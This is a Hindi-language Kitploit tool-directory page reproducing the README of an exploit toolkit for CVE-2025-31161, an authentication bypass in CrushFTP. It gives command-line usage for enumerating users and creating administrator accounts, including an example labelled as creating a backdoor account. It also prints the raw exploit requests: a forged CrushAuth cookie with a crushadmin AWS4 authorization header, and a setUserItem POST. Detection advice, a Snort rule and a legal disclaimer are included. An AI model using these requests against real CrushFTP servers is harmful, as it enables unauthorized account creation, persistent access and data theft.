Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CrushFTP-auth-bypass-CVE-2025-31161 — CVE-2025-31161 के लिए बहु-भाषा शोषण टूलकिट, CrushFTP में एक प्रमाणीकरण बाईपास। यह अधिकृत सुरक्षा परीक्षण और CTF चुनौतियों के लिए भेद्यता का पता लगाने, उपयोगकर्ता गणना, और अनधिकृत व्यवस्थापक खाता निर्माण को सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/0xdtc/crushftp-auth-bypass-cve-2025-31161
प्रमाणीकरण और प्राधिकरणपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रेड टीमिंग
GitHub0xdtc/crushftp-auth-bypass-cve-2025-31161

CrushFTP-auth-bypass-CVE-2025-31161

CVE-2025-31161 के लिए बहु-भाषा शोषण टूलकिट, CrushFTP में एक प्रमाणीकरण बाईपास। यह अधिकृत सुरक्षा परीक्षण और CTF चुनौतियों के लिए भेद्यता का पता लगाने, उपयोगकर्ता गणना, और अनधिकृत व्यवस्थापक खाता निर्माण को सक्षम करता है।

रिपॉजिटरी देखें
10 महीने पहलेअभी तक समीक्षित नहीं

CrushFTP प्रमाणीकरण बाईपास - CVE-2025-31161

License: MIT CVE Go Bash

CVE-2025-31161 का शोषण करने के लिए एक व्यापक टूलकिट, जो CrushFTP में एक प्रमाणीकरण बाईपास भेद्यता है जो अनधिकृत उपयोगकर्ता खाता निर्माण की अनुमति देता है।

🔍 CVE-2025-31161 क्या है?

CVE-2025-31161 CrushFTP में एक महत्वपूर्ण प्रमाणीकरण बाईपास भेद्यता है जो हमलावरों को उचित प्रमाणीकरण के बिना अनधिकृत उपयोगकर्ता खाते बनाने की अनुमति देती है। यह भेद्यता वेब इंटरफ़ेस के उपयोगकर्ता प्रबंधन कार्यक्षमता में मौजूद है।

तकनीकी विवरण

  • CVSS स्कोर: TBD
  • प्रभावित सॉफ्टवेयर: CrushFTP वेब इंटरफ़ेस
  • हमला वेक्टर: नेटवर्क
  • आवश्यक प्रमाणीकरण: कोई नहीं
  • प्रभाव: अनधिकृत खाता निर्माण के माध्यम से पूर्ण सिस्टम समझौता

🚀 विशेषताएं

  • बहु-भाषा समर्थन: Go और Bash कार्यान्वयन
  • स्मार्ट भेद्यता का पता लगाना: शोषण से पहले स्वचालित रूप से जांचता है कि लक्ष्य असुरक्षित है या नहीं
  • उपयोगकर्ता गणना: असुरक्षित लक्ष्यों पर मौजूदा उपयोगकर्ताओं की सूची बनाएं
  • उपयोगकर्ता निर्माण: नए प्रशासनिक खाते बनाएं
  • इंटरैक्टिव मोड: केवल तब क्रेडेंशियल्स के लिए संकेत देता है जब लक्ष्य असुरक्षित पुष्टि हो
  • शॉर्टहैंड फ़्लैग्स: -t, -p, -tu फ़्लैग्स के साथ त्वरित पहुंच
  • कस्टम पोर्ट समर्थन: विभिन्न परिनियोजन परिदृश्यों के लिए कॉन्फ़िगर करने योग्य पोर्ट
  • शैक्षिक फोकस: CTF चुनौतियों और सुरक्षा अनुसंधान के लिए डिज़ाइन किया गया

📁 रिपॉजिटरी संरचना

root@kitploit:~
CrushFTP-auth-bypass-CVE-2025-31161/
├── README.md                 # This documentation
├── cve-2025-31161.go        # Go implementation (recommended)
├── cve-2025-31161.sh        # Bash implementation
└── LICENSE                  # MIT License

🛠️ स्थापना और आवश्यकताएं

पूर्वापेक्षाएँ

Go संस्करण के लिए (अनुशंसित)

root@kitploit:~
# Install Go (if not already installed)
sudo apt install golang-go
# or
wget https://go.dev/dl/go1.21.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin

Bash संस्करण के लिए

root@kitploit:~
# Requires curl (usually pre-installed)
sudo apt install curl

त्वरित सेटअप

root@kitploit:~
git clone <repository-url>
cd CrushFTP-auth-bypass-CVE-2025-31161
chmod +x cve-2025-31161.sh

🎯 उपयोग

Go संस्करण (अनुशंसित)

उपयोगकर्ताओं की सूची बनाएं

root@kitploit:~
# Basic usage with shorthand flags
go run cve-2025-31161.go -t example.com -lu

# With custom port
go run cve-2025-31161.go -t example.com -p 8080 -lu

# Long form flags
go run cve-2025-31161.go --target_host example.com --port 8080 -lu

नया उपयोगकर्ता जोड़ें

root@kitploit:~
# Create new user (will prompt for username/password)
go run cve-2025-31161.go -t example.com -au

# With custom target user (default: crushadmin)
go run cve-2025-31161.go -t example.com -tu admin -au

# Long form flags
go run cve-2025-31161.go --target_host example.com --target_user admin -au

Bash संस्करण

उपयोगकर्ताओं की सूची बनाएं

root@kitploit:~
# Basic usage
./cve-2025-31161.sh -t example.com -lu

# With custom port
./cve-2025-31161.sh -t example.com -p 8080 -lu

नया उपयोगकर्ता जोड़ें

root@kitploit:~
# Create new user
./cve-2025-31161.sh -t example.com -au

# With custom settings
./cve-2025-31161.sh -t example.com -p 8080 -tu crushadmin -au

उपलब्ध फ़्लैग्स

उपयोग उदाहरण

root@kitploit:~
# Example 1: Enumerate users on target
go run cve-2025-31161.go -t ftp.example.htb -lu

# Example 2: Create backdoor account
go run cve-2025-31161.go -t ftp.example.htb -au
# Then enter: username: backdoor, password: P@ssw0rd123

# Example 3: Non-standard port with user enumeration
./cve-2025-31161.sh -t 192.168.1.100 -p 9090 -lu

# View help
./cve-2025-31161.sh --help

🔄 यह कैसे काम करता है

root@kitploit:~
flowchart TD
    A[Start Exploit] --> B[Check Target Connectivity]
    B --> C{Target Reachable?}
    C -->|No| D[Exit: Connection Failed]
    C -->|Yes| E[Send getUserList Request]
    E --> F{Response Contains OK?}
    F -->|No| G[Exit: Not Vulnerable]
    F -->|Yes| H[Target is Vulnerable!]
    H --> I{Mode Selected?}
    I -->|List Users -lu| J[Parse XML Response]
    J --> K[Display User List]
    K --> L[Exit: Success]
    I -->|Add User -au| M[Prompt for Username]
    M --> N[Prompt for Password]
    N --> O[Send Warm-up Request]
    O --> P[Craft User Creation Payload]
    P --> Q[Send setUserItem Request]
    Q --> R{User Created Successfully?}
    R -->|Yes| S[Success: Account Created]
    R -->|No| T[Failed: Exploitation Failed]

    style A fill:#e1f5fe
    style H fill:#c8e6c9
    style K fill:#81c784
    style S fill:#4caf50
    style D fill:#ffcdd2
    style G fill:#ffcdd2
    style T fill:#ffcdd2

🧪 शोषण प्रवाह समझाया गया

चरण 1: भेद्यता का पता लगाना

स्क्रिप्ट पहले यह जांचने के लिए एक getUserList अनुरोध भेजती है कि लक्ष्य असुरक्षित है या नहीं:

root@kitploit:~
GET /webinterface/function/?command=getUserList&serverGroup=MainUsers&c2f=wIwV
Cookie: CrushAuth=1758816957058_vuiPVygdYnM1kzYGOs9d3tzIbFWIwV
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/

यदि प्रतिक्रिया में <response_status>OK</response_status> शामिल है, तो लक्ष्य असुरक्षित है।

चरण 2a: उपयोगकर्ता गणना (उपयोगकर्ताओं की सूची मोड)

-lu फ़्लैग का उपयोग करते समय, स्क्रिप्ट XML प्रतिक्रिया को पार्स करती है और उपयोगकर्ता नाम निकालती है:

root@kitploit:~
<user_list type="vector">
    <user_list_subitem>ben</user_list_subitem>
    <user_list_subitem>crushadmin</user_list_subitem>
    <user_list_subitem>default</user_list_subitem>
</user_list>

आउटपुट:

root@kitploit:~
[+] Users:
  - ben
  - crushadmin
  - default

चरण 2b: उपयोगकर्ता खाता निर्माण (उपयोगकर्ता जोड़ें मोड)

-au फ़्लैग का उपयोग करते समय, स्क्रिप्ट दुर्भावनापूर्ण XML पेलोड के साथ एक setUserItem अनुरोध भेजती है:

root@kitploit:~
POST /webinterface/function/
Content-Type: application/x-www-form-urlencoded

command=setUserItem&data_action=replace&serverGroup=MainUsers&username=newuser&user=<USER_XML>&xmlItem=user&vfs_items=<VFS_XML>&permissions=<PERMISSIONS_XML>&c2f=31If

चरण 3: सत्यापन

स्क्रिप्ट सफल उपयोगकर्ता निर्माण की पुष्टि करने के लिए प्रतिक्रिया में <response_status>OK</response_status> की जाँच करती है।


⚠️ भेद्यता विवरण

मूल कारण

यह भेद्यता CrushFTP वेब इंटरफ़ेस के उपयोगकर्ता प्रबंधन कार्यक्षमता में अपर्याप्त प्रमाणीकरण जाँचों से उत्पन्न होती है। एप्लिकेशन कॉल करने वाले की अनुमतियों को ठीक से मान्य किए बिना उपयोगकर्ता निर्माण अनुरोधों को स्वीकार करता है।

प्रभाव मूल्यांकन

  • गोपनीयता: उच्च - फ़ाइल सिस्टम तक अनधिकृत पहुंच
  • अखंडता: उच्च - फ़ाइलों को संशोधित/अपलोड करने की क्षमता
  • उपलब्धता: मध्यम - संसाधन थकावट की संभावना

हमले के परिदृश्य

  1. प्रारंभिक पहुंच: स्थायी पहुंच के लिए बैकडोर खाते बनाएं
  2. विशेषाधिकार वृद्धि: प्रशासन-स्तर के खाते बनाएं
  3. डेटा निकासी: FTP इंटरफ़ेस के माध्यम से संवेदनशील फ़ाइलों तक पहुंचें
  4. पार्श्व गति: समझौता किए गए FTP सर्वर को पिवट पॉइंट के रूप में उपयोग करें

🛡️ पता लगाना और शमन

पता लगाने के तरीके

  • वेब लॉग में असामान्य setUserItem अनुरोधों की निगरानी करें
  • सामान्य प्रक्रियाओं के बाहर बनाए गए नए उपयोगकर्ता खातों की जाँच करें
  • प्रमाणीकरण बाईपास पैटर्न के लिए विसंगति का पता लगाना लागू करें

शमन रणनीतियाँ

  1. तत्काल: /webinterface/function/ एंडपॉइंट तक पहुंच को अवरुद्ध करें
  2. अल्पकालिक: पैच किए गए CrushFTP संस्करण में अपडेट करें
  3. दीर्घकालिक: उचित प्रमाणीकरण नियंत्रण लागू करें

नेटवर्क हस्ताक्षर

root@kitploit:~
# Snort/Suricata Rule Example
alert http any any -> any any (msg:"CrushFTP CVE-2025-31161 Exploit Attempt"; flow:established,to_server; content:"setUserItem"; http_uri; content:"serverGroup=MainUsers"; http_client_body; sid:1000001; rev:1;)

🎓 शैक्षिक उपयोग के मामले

CTF परिदृश्य

  • वेब एप्लीकेशन सुरक्षा: प्रमाणीकरण बाईपास भेद्यताओं को समझना
  • पेनिट्रेशन टेस्टिंग: वास्तविक दुनिया के शोषण तकनीकों का प्रदर्शन
  • रेड टीम अभ्यास: APT-शैली के हमलों का अनुकरण

सीखने के उद्देश्य

  • HTTP अनुरोध हेरफेर को समझना
  • XML इंजेक्शन तकनीकें
  • प्रमाणीकरण बाईपास पद्धतियाँ
  • बहु-भाषा शोषण विकास

🚨 कानूनी अस्वीकरण

⚠️ महत्वपूर्ण: यह उपकरण इसके लिए डिज़ाइन किया गया है:

  • शैक्षिक उद्देश्य
  • अधिकृत पेनिट्रेशन टेस्टिंग
  • CTF प्रतियोगिताएं
  • नियंत्रित वातावरण में सुरक्षा अनुसंधान

स्पष्ट लिखित अनुमति के बिना सिस्टम पर उपयोग न करें। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है और इसके गंभीर कानूनी परिणाम हो सकते हैं।

🤝 योगदान

योगदान का स्वागत है! कृपया:

  1. रिपॉजिटरी को फोर्क करें
  2. एक फीचर ब्रांच बनाएं (git checkout -b feature/improvement)
  3. अपने परिवर्तन कमिट करें (git commit -am 'Add new feature')
  4. ब्रांच पर पुश करें (git push origin feature/improvement)
  5. पुल अनुरोध बनाएं

विकास दिशानिर्देश

  • मौजूदा कोड शैली का पालन करें
  • व्यापक टिप्पणियाँ जोड़ें
  • कई लक्ष्य वातावरणों पर परीक्षण करें
  • नई सुविधाओं के लिए दस्तावेज़ीकरण अपडेट करें

📝 संस्करण इतिहास

संस्करणदिनांकपरिवर्तन
1.0.02025-01-XXGo और Bash कार्यान्वयन के साथ प्रारंभिक रिलीज़
1.1.02025-01-XXइंटरैक्टिव मोड और भेद्यता का पता लगाना
1.2.02025-10-02

📚 संदर्भ

  • CVE-2025-31161 विवरण
  • CrushFTP आधिकारिक वेबसाइट
  • OWASP प्रमाणीकरण बाईपास
  • Immersive Labs द्वारा मूल शोध

📧 संपर्क

प्रश्नों, सुझावों या सुरक्षा संबंधी चिंताओं के लिए, कृपया इस रिपॉजिटरी में एक मुद्दा खोलें।

टूल डाउनलोड करें
फ़्लैगलंबा रूपविवरणडिफ़ॉल्ट
-t--target_hostलक्ष्य होस्टनाम या आईपी (आवश्यक)-
-p--portलक्ष्य पोर्ट80
-tu--target_userशोषण के लिए लक्ष्य उपयोगकर्ताcrushadmin
-lu--list-usersमौजूदा उपयोगकर्ताओं की सूची बनाएं-
-au--add-userनया उपयोगकर्ता जोड़ें (इंटरैक्टिव)-
--helpसहायता संदेश दिखाएं-
उपयोगकर्ता गणना (-lu), अलग उपयोगकर्ता जोड़ें मोड (-au), शॉर्टहैंड फ़्लैग्स (-t, -p, -tu) जोड़ा गया